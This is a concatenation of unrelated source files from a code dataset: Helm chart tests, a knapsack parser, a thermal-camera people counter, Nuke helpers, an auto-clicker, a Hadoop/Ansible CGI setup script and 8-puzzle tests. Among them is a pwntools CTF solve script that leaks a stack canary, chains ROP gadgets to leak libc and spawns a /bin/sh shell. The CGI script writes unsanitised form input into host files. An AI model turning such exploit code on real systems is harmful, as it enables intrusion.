*args):\n \"\"\"Assert that we raise the correct error if call() blows up\"\"\"\n chart = self.get_chart()\n mock_cmd_call.side_effect = [Exception('holy smokes, an error!')]\n with self.assertRaises(ReckonerCommandException):\n chart.run_hook('pre_install')\n\n def test_raises_error_when_any_hook_fails(self, mock_cmd_call, *args):\n \"\"\"Assert that we raise an error when commands fail and we don't run subsequent commands.\"\"\"\n good_response = Response(\n exitcode=0,\n stderr='',\n stdout='some info',\n command_string='my --command',\n )\n bad_response = Response(\n exitcode=127,\n stderr='found exit code 127 set in test mock',\n stdout='here would be stdout',\n command_string='mock --command',\n )\n\n chart = self.get_chart()\n chart.hooks['pre_install'] = ['', '', '']\n\n mock_cmd_call.side_effect = [good_response, bad_response, good_response]\n\n with self.assertRaises(ReckonerCommandException):\n chart.run_hook('pre_install')\n\n self.assertEqual(mock_cmd_call.call_count, 2, \"Call two should fail and not run the third hook.\")\n\n @mock.patch('reckoner.chart.logging', autospec=True)\n def 
test_logging_info_and_errors(self, mock_logging, mock_cmd_call, *args):\n \"\"\"Verify we log the right info when call() fails and succeeds\"\"\"\n chart = self.get_chart()\n\n # This is actually not a good test because it tightly couples the\n # implementation of logging to the test. Not sure how to do this any\n # better.\n # What I really want to test is that we're sending our info to the cli\n # user when hooks run.\n bad_response = mock.Mock(Response,\n exitcode=1,\n stderr='some error',\n stdout='some info',\n command_string='my --command')\n good_response = mock.Mock(Response,\n exitcode=0,\n stderr='',\n stdout='some info',\n command_string='my --command')\n mock_cmd_call.side_effect = [good_response]\n chart.run_hook('pre_install')\n mock_logging.error.assert_not_called()\n mock_logging.info.assert_called()\n\n mock_cmd_call.side_effect = [good_response, bad_response]\n mock_logging.reset_mock()\n with self.assertRaises(ReckonerCommandException):\n chart.run_hook('post_install')\n mock_logging.error.assert_called()\n mock_logging.info.assert_called()\n mock_logging.log.assert_called()\n\n def test_skipping_due_to_dryrun(self, mock_cmd_call, *args):\n \"\"\"Verify that we do NOT run the actual calls when dryrun is enabled\"\"\"\n chart = self.get_chart()\n chart.config.dryrun = True\n chart.run_hook('pre_install')\n mock_cmd_call.assert_not_called()\n\n def test_hooks_support_list(self, mock_cmd_call, *args):\n \"\"\"Assert that hooks can be defined as lists\"\"\"\n chart = self.get_chart()\n chart.hooks = {\n 'pre_install': [\n 'works',\n 'twice works',\n ]\n }\n\n mock_cmd_call.side_effect = [\n Response(command_string='command', stderr='err-output', stdout='output', exitcode=0),\n Response(command_string='command', stderr='err-output', stdout='output', exitcode=0),\n ]\n chart.run_hook('pre_install')\n self.assertTrue(mock_cmd_call.call_count == 2)\n\n def test_hooks_support_strings(self, mock_cmd_call, *args):\n \"\"\"Assert that hooks can be defined as a string\"\"\"\n chart = self.get_chart()\n chart.hooks = {\n 'pre_install': 'works'\n }\n\n mock_cmd_call.side_effect = [Response(command_string='command', stderr='err-output', stdout='output', exitcode=0)]\n chart.run_hook('pre_install')\n mock_cmd_call.assert_called_once()\n\n\n# @mock.patch('reckoner.chart.Repository')\n# @mock.patch('reckoner.chart.Config')\n# # I have to strictly design the mock for Reckoner due to the nature of the\n# # key/val class setup. 
If the class actually had attributes then this\n# # would be more easily mockable\n# @mock.patch('reckoner.chart.call')\nclass TestCharts(unittest.TestCase):\n \"\"\"Test charts\"\"\"\n\n @mock.patch('reckoner.chart.os')\n def test_interpolation_of_env_vars(self, environMock):\n chart = Chart({'name': {'values': {}}}, None)\n chart.config.dryrun = False\n\n chart.args = ['thing=${environVar}', 'another=$environVar']\n environMock.environ = {'environVar': 'asdf'}\n\n chart._check_env_vars()\n self.assertEqual(chart.args[0], 'thing=asdf')\n self.assertEqual(chart.args[1], 'another=asdf')\n\n @mock.patch('reckoner.chart.os')\n def test_interpolation_of_missing_env_vars(self, environMock):\n chart = Chart({'name': {'values': {}}}, None)\n chart.config.dryrun = False\n\n chart.args = ['thing=${environVar}']\n environMock.environ = {}\n\n with self.assertRaises(Exception):\n chart._check_env_vars()\n\n @mock.patch('reckoner.chart.os')\n def test_interpolation_of_env_vars_kube_deploy_spec(self, environMock):\n chart = Chart({'name': {'values': {}}}, None)\n chart.config.dryrun = False\n\n chart.args = ['thing=$(environVar)']\n environMock.environ = {}\n\n chart._check_env_vars()\n self.assertEqual(chart.args[0], 'thing=$(environVar)')\n\n @mock.patch('reckoner.chart.Repository')\n def test_chart_install(self, repositoryMock):\n repo_mock = repositoryMock()\n repo_mock.chart_path = \"\"\n helm_client_mock = mock.MagicMock()\n\n chart = Chart({'nameofchart': {'namespace': 'fakenamespace', 'set-values': {}}}, helm_client_mock)\n chart.config.dryrun = False\n\n chart.install()\n helm_client_mock.upgrade.assert_called_once()\n upgrade_call = helm_client_mock.upgrade.call_args\n self.assertEqual(upgrade_call[0][0], ['nameofchart', '', '--namespace', 'fakenamespace'])\n\n @mock.patch('reckoner.chart.Repository')\n def test_chart_install_with_plugin(self, repositoryMock):\n repo_mock = repositoryMock()\n repo_mock.chart_path = \"\"\n helm_client_mock = mock.MagicMock()\n\n chart = Chart({'nameofchart': {'namespace': 'fakenamespace', 'plugin': 'someplugin', 'set-values': {}}}, helm_client_mock)\n chart.config.dryrun = False\n\n chart.install()\n helm_client_mock.upgrade.assert_called_once()\n upgrade_call = helm_client_mock.upgrade.call_args\n self.assertEqual(upgrade_call[0][0], ['nameofchart', '', '--namespace', 'fakenamespace'])\n self.assertEqual(upgrade_call[1], {'plugin': 'someplugin'})\n\n\nclass TestChartResult(unittest.TestCase):\n def test_initialize(self):\n c = ChartResult(\n name=\"fake-result\",\n failed=False,\n error_reason=\"\",\n )\n\n assert c\n\n def test_string_output(self):\n c = ChartResult(name=\"fake-result\", failed=False, error_reason=\"oops\")\n string_output = c.__str__()\n self.assertIn(\"fake-result\", string_output)\n self.assertIn(\"Succeeded\", string_output)\n self.assertIn(c.error_reason, string_output)\n\n def test_status_string(self):\n c = ChartResult(name=\"railed-result\", failed=True, error_reason=\"\")\n self.assertEqual(c.status_string, \"Failed\")\n c.failed = False\n self.assertEqual(c.status_string, \"Succeeded\")\n\n\nclass TestTemporaryValuesFiles(unittest.TestCase):\n \"\"\"Test the cases for Temporary values files\"\"\"\n\n def test_chart_initializes_empty_file_paths(self):\n \"\"\"Assert that we initialize the empty list for new charts\"\"\"\n chart = Chart({\"fake-chart\": {}}, None)\n self.assertEqual(chart._temp_values_file_paths, [])\n\n def test_chart_creates_temp_value_files(self):\n chart = Chart({\"fake-chart\": {}}, None)\n chart.values = 
{\"fake-key\": \"fake-value\"}\n self.assertEqual(len(chart._temp_values_file_paths), 0)\n\n chart.build_temp_values_files()\n self.assertEqual(len(chart._temp_values_file_paths), 1)\n\n @mock.patch('reckoner.chart.os', autospec=True)\n def test_remove_temp_files(self, mock_os):\n \"\"\"Assert that a temp file in the list has os.remove called against it\"\"\"\n chart = Chart({\"fake-chart\": {}}, None)\n chart._temp_values_file_paths.append('non/existent-path')\n chart.clean_up_temp_files()\n mock_os.remove.assert_called_once()\n\n\nclass TestBuildSetArguments(unittest.TestCase):\n \"\"\"Test the build set args for helm chart\"\"\"\n\n def setUp(self):\n self.chart_object = {\n \"fake-chart\": {\n \"set-values\": {\n \"keyone\": \"valueone\",\n }\n }\n }\n\n def test_flat_key_values(self):\n chart = Chart(self.chart_object, None)\n\n self.assertEqual(chart.args, [], \"self.args should be empty before running\")\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\"--set\", \"keyone=valueone\"], \"Expected build_set_arguments to build --set args correctly.\")\n\n def test_dicts(self):\n chart = Chart(self.chart_object, None)\n chart.set_values = {\n \"levelone\": {\n \"leveltwo\": \"valuetwo\",\n }\n }\n\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\"--set\", \"levelone.leveltwo=valuetwo\"])\n\n chart.args = []\n chart.set_values = {\n \"levelone\": {\n \"leveltwo\": {\n \"levelthree\": {\n \"levelfour\": \"value four\",\n }\n }\n }\n }\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\"--set\", \"levelone.leveltwo.levelthree.levelfour=value four\"])\n\n def test_yaml_loaded_integration(self):\n yaml_file = StringIO('''\n---\ncharts:\n my-chart:\n set-values:\n keyone: value one\n keytwo:\n keythree: value three\n keyfour:\n - --settings\n keyfive:\n - --one\n - --two\n deeplynested_objects:\n - name: hiya\n another:\n nested: value\n nesting: value\n - non: conforming\n lists:\n - more lists\n - and more\n - and:\n a_random_dict: value\n''')\n course = Handler.load(yaml_file)\n chart = Chart(course[\"charts\"], None)\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\n \"--set\", \"keyone=value one\",\n \"--set\", \"keytwo.keythree=value three\",\n \"--set\", \"keytwo.keyfour[0]=--settings\",\n \"--set\", \"keyfive[0]=--one\",\n \"--set\", \"keyfive[1]=--two\",\n \"--set\", \"deeplynested_objects[0].name=hiya\",\n \"--set\", \"deeplynested_objects[0].another.nested=value\",\n \"--set\", \"deeplynested_objects[0].another.nesting=value\",\n \"--set\", \"deeplynested_objects[1].non=conforming\",\n \"--set\", \"deeplynested_objects[1].lists[0]=more lists\",\n \"--set\", \"deeplynested_objects[1].lists[1]=and more\",\n \"--set\", \"deeplynested_objects[1].lists[2].and.a_random_dict=value\",\n ])\n\n def test_null_value(self):\n chart = Chart(self.chart_object, None)\n chart.set_values = {\n \"testnull\": None,\n }\n\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\n \"--set\", \"testnull=null\",\n ])\n\n\nclass TestBuildSetStringsArguments(unittest.TestCase):\n \"\"\"Test building of set strings\"\"\"\n\n def setUp(self):\n self.chart_object = {\n \"fake-chart\": {\n \"values-strings\": {\n \"keyone\": \"valueone\",\n }\n }\n }\n\n def test_flat_key_values(self):\n chart = Chart(self.chart_object, None)\n\n self.assertEqual(chart.args, [], \"self.args should be empty before running\")\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\"--set-string\", \"keyone=valueone\"], \"Expected build_set_arguments to 
build --set args correctly.\")\n\n def test_dicts(self):\n chart = Chart(self.chart_object, None)\n chart.values_strings = {\n \"levelone\": {\n \"leveltwo\": \"valuetwo\",\n }\n }\n\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\"--set-string\", \"levelone.leveltwo=valuetwo\"])\n\n chart.args = []\n chart.values_strings = {\n \"levelone\": {\n \"leveltwo\": {\n \"levelthree\": {\n \"levelfour\": \"value four\",\n }\n }\n }\n }\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\"--set-string\", \"levelone.leveltwo.levelthree.levelfour=value four\"])\n\n def test_yaml_loaded_integration(self):\n yaml_file = StringIO('''\n---\ncharts:\n my-chart:\n values-strings:\n keyone: value one\n keytwo:\n keythree: value three\n keyfour:\n - --settings\n keyfive:\n - --one\n - --two\n deeplynested_objects:\n - name: hiya\n another:\n nested: value\n nesting: value\n - non: conforming\n lists:\n - more lists\n - and more\n - and:\n a_random_dict: value\n''')\n course = Handler.load(yaml_file)\n chart = Chart(course[\"charts\"], None)\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\n \"--set-string\", \"keyone=value one\",\n \"--set-string\", \"keytwo.keythree=value three\",\n \"--set-string\", \"keytwo.keyfour[0]=--settings\",\n \"--set-string\", \"keyfive[0]=--one\",\n \"--set-string\", \"keyfive[1]=--two\",\n \"--set-string\", \"deeplynested_objects[0].name=hiya\",\n \"--set-string\", \"deeplynested_objects[0].another.nested=value\",\n \"--set-string\", \"deeplynested_objects[0].another.nesting=value\",\n \"--set-string\", \"deeplynested_objects[1].non=conforming\",\n \"--set-string\", \"deeplynested_objects[1].lists[0]=more lists\",\n \"--set-string\", \"deeplynested_objects[1].lists[1]=and more\",\n \"--set-string\", \"deeplynested_objects[1].lists[2].and.a_random_dict=value\",\n ])\n\n def test_null_value(self):\n chart = Chart(self.chart_object, None)\n chart.values_strings = {\n \"testnull\": None,\n }\n\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\n \"--set-string\", \"testnull=null\",\n ])\n","sub_path":"reckoner/tests/test_chart.py","file_name":"test_chart.py","file_ext":"py","file_size_in_byte":17318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622208035","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\nfrom time import sleep\nimport sys\ncontext.binary = \"./rc4\"\n\nelf = ELF(\"./rc4\", checksec = False)\nlocal = sys.argv[1] == \"l\"\nif local:\n io = process(\"./rc4\")\n libc = elf.libc\nelse:\n # io = remote(\"118.31.17.25\", 20011)\n io = process(\"./rc4\", env = {\"LD_PRELOAD\": \"./libc.so.6\"})\n libc = ELF(\"./libc.so.6\", checksec = False)\n\n# context.log_level = \"debug\"\ndef static_key():\n io.sendlineafter(\"> \", \"a\")\n io.sendlineafter(\"> \", \"b\")\n return io.recvuntil(\"Crypto Test!\", drop = True).strip()\n\ndef rop(canary):\n prbp = 0x0000000000400920\n prdi = 0x0000000000401283\n leaveret = 0x0000000000400b6e\n base = elf.bss() + 0x300\n\n io.sendlineafter(\"> \", \"b\")\n sleep(0.01)\n payload = flat(cyclic(264), canary, base - 8)\n payload += flat(prdi, elf.got['read'], elf.plt['puts'])\n payload += flat(prdi, base, elf.plt['gets'])\n payload += flat(leaveret)\n io.sendline(payload)\n sleep(0.01)\n\n io.sendlineafter(\"> \", \"d\")\n io.sendlineafter(\"> \", \"n\")\n\nif __name__ == \"__main__\":\n# with context.quiet:\n # raw_input(\"DEBUG: \")\n static_key()\n canary = static_key()[-16: 
].decode('hex')\n    print(\"canary -> \" + canary.encode('hex'))\n\n    # raw_input(\"DEBUG: \")\n    rop(canary)\n    libc.address = u64(io.recvuntil(\"\\x7f\")[-6: ] + '\\0\\0') - libc.sym['read']\n    success(\"libc -> {:#x}\".format(libc.address))\n\n    prdi = 0x0000000000401283\n    payload = flat(prdi, next(libc.search(\"/bin/sh\")), libc.sym['system'])\n    io.sendline(payload)\n\n    io.interactive()\n","sub_path":"whctf2017_rc4/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"244702594","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom problem_container import ProblemContainer\n\nclass Parser(object):\n\n    #def __init__(self, filename):\n\n    @classmethod\n    def parse_file(cls, filename):\n\n        parsed_problems = []\n        identificator = 1\n\n        with open(filename, \"r+\") as file_handler:\n\n            while True:\n\n                # First line: file name\n                name = file_handler.readline()\n                if not name:\n                    # Reached the end of the file\n                    return parsed_problems\n\n                # Second line: number of items\n                cant_items = int(file_handler.readline().rstrip().split(' ')[1])\n                values = [0 for x in range(cant_items)]\n                weights = [0 for x in range(cant_items)]\n                included = [0 for x in range(cant_items)]\n\n                # Third line: knapsack capacity\n                knapsack_weight = int(file_handler.readline().rstrip().split(' ')[1])\n\n                # Fourth line: optimal solution found by the example's author\n                value_found = int(file_handler.readline().rstrip().split(' ')[1])\n\n                # Fifth line: time the example's author took to find the solution\n                time = file_handler.readline()\n\n                # From here, cant_items lines describing each item (CSV format)\n                i = 0\n                for line in file_handler:\n\n                    # The example ends with these dashes\n                    if \"-----\" in line:\n                        break\n\n                    separated_line = line.split(',')\n                    # First field: item number\n\n                    # Second field: item value\n                    values[i] = int(separated_line[1])\n\n                    # Third field: item weight\n                    weights[i] = int(separated_line[2])\n\n                    # Fourth field: whether it belongs to the optimal solution\n                    included[i] = int(separated_line[3])\n                    i += 1\n\n                parsed_problems.append(ProblemContainer(identificator, name, cant_items, knapsack_weight, value_found, time, values, weights, included))\n                identificator += 1\n\n                blank_line = file_handler.readline()\n                if not blank_line:\n                    # Reached the end of the file\n                    return parsed_problems\n","sub_path":"tp2/programacion-dinamica/knapsack/knapsack_file_parser.py","file_name":"knapsack_file_parser.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"364650711","text":"import board\nimport busio\nimport adafruit_mlx90640\nimport numpy as np\nimport cv2\nfrom math import sqrt\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Sources:\n# https://answers.opencv.org/question/210645/detection-of-people-from-above-with-thermal-camera/\n# https://www.learnopencv.com/blob-detection-using-opencv-python-c/\n# https://github.com/thequicketsystem/people-counting-visual/\n# https://stackoverflow.com/questions/35884409/how-to-extract-x-y-coordinates-from-opencv-cv2-keypoint-object\n\nIMG_WIDTH, IMG_HEIGHT = 32, 24\nTEMP_MIN, TEMP_MAX = 6, 20\n\nSCALE_FACTOR = 10\n\nSCALED_WIDTH, SCALED_HEIGHT = IMG_WIDTH * SCALE_FACTOR, IMG_HEIGHT * SCALE_FACTOR\n\nMIN_TEMP = 30\n\nSEP = (IMG_WIDTH * SCALE_FACTOR) // 2\n\nPOLLING_FRAMES_LENGTH = 4\nEXTENSION_LENGTH = 
8\n\nCONFIDENCE_THRESHOLD = 0\n\ni2c = busio.I2C(board.SCL, board.SDA, frequency=800000)\nmlx = adafruit_mlx90640.MLX90640(i2c)\nmlx.refresh_rate = adafruit_mlx90640.RefreshRate.REFRESH_16_HZ\n\nf = [0] * (IMG_WIDTH * IMG_HEIGHT)\n\n## Blob detection parameters\nparams = cv2.SimpleBlobDetector_Params()\n\n# Change thresholds\nparams.minThreshold = 0;\nparams.maxThreshold = 255;\n\n# Filter by Area.\nparams.filterByArea = True\nparams.minArea = 700\nparams.maxArea = 7000\n\n# Filter by Circularity\nparams.filterByCircularity = True\nparams.minCircularity = 0.1\n\n# Filter by Inertia\nparams.filterByInertia = True\nparams.minInertiaRatio = 0.01\n\ndetectors = [cv2.SimpleBlobDetector_create(params) for i in range(2)]\n\n# TODO: Major cleanup/un-spaghettification needed if this does actually work\ndef get_frame_data() -> int:\n\n    frames = POLLING_FRAMES_LENGTH\n    is_ext = False\n\n    top_data, bottom_data = 0, 0\n\n    while frames > 0 and not (bottom_data > CONFIDENCE_THRESHOLD and top_data > CONFIDENCE_THRESHOLD): \n        try:\n            mlx.getFrame(f)\n        except ValueError:\n            pass\n        \n        temp_data = np.array(f).reshape((IMG_HEIGHT, IMG_WIDTH))\n\n        temp_data = cv2.resize(temp_data, dsize=(SCALED_WIDTH, SCALED_HEIGHT))\n        temp_data = cv2.normalize(temp_data, temp_data, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n        # drop colder temp data\n        temp_data[temp_data < 80] = 0\n\n        # smooths the image and reduces noise while preserving edges\n        temp_data = cv2.bilateralFilter(temp_data, 9, 150, 150)\n\n        kernel = np.ones((5,5), np.uint8)\n\n        temp_data = cv2.erode(temp_data, kernel, iterations = 1)\n        temp_data = cv2.dilate(temp_data, kernel, iterations = 1)\n\n        temp_data = cv2.morphologyEx(temp_data, cv2.MORPH_CLOSE, kernel)\n\n        temp_data = cv2.bitwise_not(temp_data)\n\n        temp_data_top, temp_data_bottom = temp_data[:,:SCALED_HEIGHT], temp_data[:,SCALED_HEIGHT:]\n        \n        keypoints = []\n\n        # process the two halves in separate threads\n        # this will need to be cleaned up a lot later. 
no magic numbers!\n        with ThreadPoolExecutor() as ex:\n            td_future = ex.submit(detectors[0].detect, temp_data_top)\n            bd_future = ex.submit(detectors[1].detect, temp_data_bottom)\n\n            # join the results together\n            keypoints.extend(td_future.result())\n            keypoints.extend(bd_future.result())\n\n\n        if len(keypoints) == 1 and not is_ext:\n            frames += EXTENSION_LENGTH\n            is_ext = True\n\n        pts = cv2.KeyPoint_convert(keypoints)\n        for point in pts:\n            if point[1] < SEP:\n                top_data += 1\n            else:\n                bottom_data += 1\n\n        # Draw circles around blobs and display count on screen\n        output_frame = cv2.drawKeypoints(temp_data, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n        # Draw the top and bottom counts, plus the line dividing the two halves\n        cv2.putText(output_frame, f\"top: {top_data}\", (10, SCALED_HEIGHT - 40), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n        cv2.putText(output_frame, f\"bottom: {bottom_data}\", (10, SCALED_HEIGHT - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n        cv2.line(output_frame, (0, SCALED_HEIGHT // 2), (SCALED_WIDTH, SCALED_HEIGHT // 2), (0, 255, 255), 2)\n\n        cv2.imshow(\"People Counting Subsystem (Thermal) Demo\", output_frame)\n        cv2.waitKey(1)\n\n        frames -= 1\n\n    return len([x for x in [top_data, bottom_data] if x > CONFIDENCE_THRESHOLD])\n\n\nwhile True:\n    print(f\"Count:{get_frame_data()}\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"109769182","text":"# -*- coding: UTF-8 -*-\n'''\nAuthor: Jaime Rivera\nFile: nuke_specific_functions.py\nDate: 2019.09.29\nRevision: 2019.09.29\nCopyright: Copyright Jaime Rivera 2019 | www.jaimervq.com\n           The program(s) herein may be used, modified and/or distributed in accordance with the terms and conditions\n           stipulated in the Creative Commons license under which the program(s) have been registered. 
(CC BY-SA 4.0)\n\nBrief:\n\n'''\n\n__author__ = 'Jaime Rivera '\n__copyright__ = 'Copyright 2019, Jaime Rivera'\n__credits__ = []\n__license__ = 'Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)'\n__maintainer__ = 'Jaime Rivera'\n__email__ = 'jaime.rvq@gmail.com'\n__status__ = 'Testing'\n\nimport nuke\n\ndef get_the_scene():\n scene = nuke.root().knob('name').value()\n return scene\n\ndef customize_nodes(custom_dict, only_selected_writes):\n\n response = []\n response.append(['-- CUSTOMIZING NODES --', 'cyan'])\n\n if custom_dict['scanlines']:\n for target_scanline_node in custom_dict['scanlines'].keys():\n\n node = nuke.toNode(target_scanline_node)\n\n for attr in custom_dict['scanlines'][target_scanline_node]:\n attr_value = custom_dict['scanlines'][target_scanline_node][attr]\n node[attr].setValue(attr_value)\n response.append(['ScanlineRender {0}, Attribute {1} set to {2}'.format(target_scanline_node, attr, attr_value), 'lime'])\n else:\n response.append(['INFO: No ScanlineRender nodes in the list, skipping customization step', 'orange'])\n\n\n if custom_dict['rays']:\n for target_ray_node in custom_dict['rays'].keys():\n\n node = nuke.toNode(target_ray_node)\n\n for attr in custom_dict['rays'][target_ray_node]:\n attr_value = custom_dict['rays'][target_ray_node][attr]\n node[attr].setValue(attr_value)\n response.append(['RayRender {0}, Attribute {1} set to {2}'.format(target_ray_node, attr, attr_value), 'lime'])\n else:\n response.append(['INFO: No RayRender nodes in the list, skipping customization step', 'orange'])\n\n\n if custom_dict['writes']:\n for target_write_node in custom_dict['writes'].keys():\n\n node = nuke.toNode(target_write_node)\n\n selected = custom_dict['writes'][target_write_node]['selected']\n\n if (not selected) and (only_selected_writes):\n response.append(['Write node {0} was not selected, will not be customized/rendered'.format(target_write_node), 'orange'])\n else:\n file_value = custom_dict['writes'][target_write_node]['file']\n node['file'].setValue(file_value)\n response.append([\"Write node {0}, Attribute 'file' set to {1}\".format(target_write_node, file_value), 'lime'])\n else:\n response.append(['INFO: No Write nodes in the list, skipping customization step', 'orange'])\n\n\n return response\n\n\ndef write_custom(custom_dict, only_selected_writes):\n\n response = []\n response.append(['-- WRITING --', 'cyan'])\n\n if custom_dict['writes']:\n for target_write_node in custom_dict['writes'].keys():\n\n node = nuke.toNode(target_write_node)\n\n frame_start = 0\n frame_end = 1\n frame_range = custom_dict['writes'][target_write_node]['range']\n if '-' in frame_range:\n frame_start = frame_range.split('-')[0]\n frame_end = frame_range.split('-')[1]\n else:\n frame_start = frame_range\n frame_end = frame_range\n\n selected = custom_dict['writes'][target_write_node]['selected']\n\n if (not selected) and (only_selected_writes):\n response.append(['Write node {0} was not selected, will not be rendered'.format(target_write_node), 'orange'])\n else:\n response.append([\"STARTED Writing node {0}, for frame range {1}-{2}\".format(target_write_node, frame_start, frame_end), 'fuchsia'])\n nuke.execute(target_write_node, frame_start, frame_end)\n response.append([\"FINISHED Writing node {0}, for frame range {1}-{2}\".format(target_write_node, frame_start, frame_end), 'fuchsia'])\n\n else:\n response.append(['ERROR: No valid Write nodes to write', 'red'])\n\n return response\n\n\ndef return_to_normal(original_dict):\n\n response = []\n 
response.append(['-- RESETTING NODES BACK TO ORIGINAL VALUES --', 'cyan'])\n\n    for category in original_dict.keys():\n\n        if original_dict[category]:\n            for node in original_dict[category].keys():\n\n                n = nuke.toNode(node)\n\n                for attribute in original_dict[category][node].keys():\n\n                    attr_value = original_dict[category][node][attribute]\n                    n[attribute].setValue(attr_value)\n                    response.append([\"Restored node {0} attribute {1} back to {2}\".format(node,attribute, attr_value), 'lime'])\n        else:\n            if category == 'scanlines':\n                response.append([\"INFO: No ScanlineRender nodes were previously customized, skipping step\", 'orange'])\n            if category == 'rays':\n                response.append([\"INFO: No RayRender nodes were previously customized, skipping step\", 'orange'])\n            if category == 'writes':\n                response.append([\"INFO: No Write nodes were previously customized, skipping step\", 'orange'])\n\n    return response","sub_path":"nuke_specific_functions.py","file_name":"nuke_specific_functions.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"251574483","text":"import pyautogui\r\nimport time\r\n\r\nantall_klikk = 10\r\ndelay = 1\r\n\r\npyautogui.FAILSAFE = True\r\n\r\nk = 0\r\n\r\nwhile k < antall_klikk:\r\n    pyautogui.click()\r\n    print(\"Click number \", k)\r\n    time.sleep(delay)\r\n\r\n    k = k + 1\r\n\r\n","sub_path":"klikk-script.py","file_name":"klikk-script.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"638392756","text":"#!/usr/bin/python2\n\nprint(\"content-type: text/html\")\nprint(\"\")\n\n#print(\"hello\")\n\nimport cgi\nimport commands as sp\n\nform=cgi.FormContent()\nprint(form)\n\nmaster=[]\nslave=[]\njob=[]\ntask=[]\nfor i in form.keys():\n\tif 'm' in i:\n\t\tmaster.append(i)\n\telif 'd' in i:\n\t\tslave.append(i)\n\telif 'j' in i:\n\t\tjob.append(i)\n\telif 't' in i:\n\t\ttask.append(i)\nsp.getoutput(\"sudo chown apache /ws_ansible\")\nfdir=open('/ws_ansible/dir_var.yml','w')\nd=sp.getoutput(\"date +%F%T\")\nfdir.write(\"master: m{} \\n\".format(d))\nfdir.write(\"slave: s{} \\n\".format(d))\nfdir.write(\"mip1: {} \\n\".format(form.get('mip1')[0]))\nfdir.write(\"jip: {} \\n\".format(form.get('jip')[0]))\nfdir.close()\n\n\n\nsp.getoutput(\"sudo chown apache /myhosts\")\nfhost=open('/myhosts/hosts','w')\n\nfhost.write(\"[master]\\n\")\nfor i in master:\n\tfhost.write(form[i][0] + '\\n')\nfhost.write(\"[slave]\\n\")\nfor i in slave:\n\tfhost.write(form[i][0]+'\\n')\nfhost.write(\"[job]\\n\")\nfor i in job:\n\tfhost.write(form[i][0]+'\\n')\n\nfhost.write(\"[task]\\n\")\nfor i in task:\n\tfhost.write(form[i][0]+'\\n')\n\nfhost.close()\n\nprint(\"\"\"\nWE RECEIVED YOUR DATA SUCCESSFULLY\n\nCLICK TO START:\n\n\nNAMENODE:\n\n\n\n\nJOBTRACKER: \n\n\n\nDATANODE: \n\n\n\nTASKTRACKER:\n
\n\"\"\")\n","sub_path":"hadoop setup ansible/final_setup.py","file_name":"final_setup.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"514199362","text":"from funny_puzzle import *\r\nimport sys\r\nimport time\r\n\r\nif __name__ == '__main__':\r\n\r\n # set this to \"new\" for updated version\r\n # that demands requeuing\r\n # set this to \"original\"\r\n # for the crappy one\r\n ref_version = \"new\"\r\n\r\n # this is necessary to print to file\r\n backup_stdout = sys.stdout\r\n sys.stdout = open('test.txt', 'w')\r\n starttime = time.time()\r\n\r\n # these are a bunch of random test cases\r\n \r\n solve([6, 4, 7, 8, 5, 0, 3, 2, 1])\r\n solve([8, 2, 7, 3, 1, 6, 4, 0, 5])\r\n solve([6, 5, 7, 1, 8, 2, 3, 4, 0])\r\n solve([8, 6, 5, 7, 1, 4, 0, 2, 3])\r\n solve([6, 4, 8, 2, 3, 5, 1, 7, 0])\r\n solve([7, 8, 6, 5, 4, 0, 2, 3, 1])\r\n solve([6, 5, 7, 4, 0, 2, 3, 1, 8])\r\n solve([3, 6, 2, 5, 8, 0, 4, 7, 1])\r\n #solve([8, 6, 7, 2, 5, 4, 3, 0, 1])\r\n\r\n print_succ([6, 4, 7, 8, 5, 0, 3, 2, 1])\r\n print_succ([8, 2, 7, 3, 1, 6, 4, 0, 5])\r\n print_succ([6, 5, 7, 1, 8, 2, 3, 4, 0])\r\n print_succ([8, 6, 5, 7, 1, 4, 0, 2, 3])\r\n print_succ([6, 4, 8, 2, 3, 5, 1, 7, 0])\r\n print_succ([7, 8, 6, 5, 4, 0, 2, 3, 1])\r\n print_succ([6, 5, 7, 4, 0, 2, 3, 1, 8])\r\n print_succ([3, 6, 2, 5, 8, 0, 4, 7, 1])\r\n\r\n # These are unsolvable\r\n #solve([7, 2, 8, 5, 0, 4, 3, 6, 1])\r\n #solve([1, 2, 3, 4, 0, 6, 7, 8, 5])\r\n #solve([8, 7, 5, 6, 0, 4, 3, 2, 1])\r\n\r\n # these are examples from the writeup\r\n print_succ([1, 2, 3, 4, 5, 0, 6, 7, 8])\r\n solve([4, 3, 8, 5, 1, 6, 7, 2, 0])\r\n print_succ([8, 7, 6, 5, 4, 3, 2, 1, 0])\r\n solve([1, 2, 3, 